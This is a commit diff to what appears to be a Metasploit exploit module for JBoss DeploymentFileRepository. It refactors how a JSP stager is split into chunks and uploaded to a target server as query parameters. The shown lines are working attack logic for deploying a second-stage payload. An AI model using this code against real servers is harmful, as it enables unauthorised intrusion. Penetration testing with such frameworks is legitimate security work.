Use vars_get instead of direct URI concatenation

Vincent Herbulot · Vincent Herbulot · commit 63426793ef3d · 2014-10-02T11:03:12.000+02:00
diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb
@@ -129,17 +129,18 @@ def exploit
       print_status("Deploying minimal stager to upload the payload")
       head_stager_jsp_name = rand_text_alpha(8+rand(8))
       head_stager_contents = head_stager_jsp(stager_base, stager_jsp_name)
-      head_stager_uri = "/" + stager_base + "/" + head_stager_jsp_name + ".jsp?"
+      head_stager_uri = "/" + stager_base + "/" + head_stager_jsp_name + ".jsp"
       res = upload_file(stager_base, head_stager_jsp_name, head_stager_contents)
 
       # We split the stager_jsp_code in multipe junks and transfer on the
       # target with multiple requests
       current_pos = 0
       while current_pos < stager_contents.length
         next_pos = current_pos + 5000 + rand(100)
-        junk = "arg0=" + Rex::Text.uri_encode(stager_contents[current_pos,next_pos])
+        vars_get = { "arg0" => stager_contents[current_pos,next_pos] }
         print_status("Uploading second stager (#{current_pos}/#{stager_contents.length})")
-        res = deploy('uri' => head_stager_uri + junk)
+        res = deploy('uri' => head_stager_uri,
+                     'vars_get' => vars_get)
         current_pos += next_pos
       end
     end
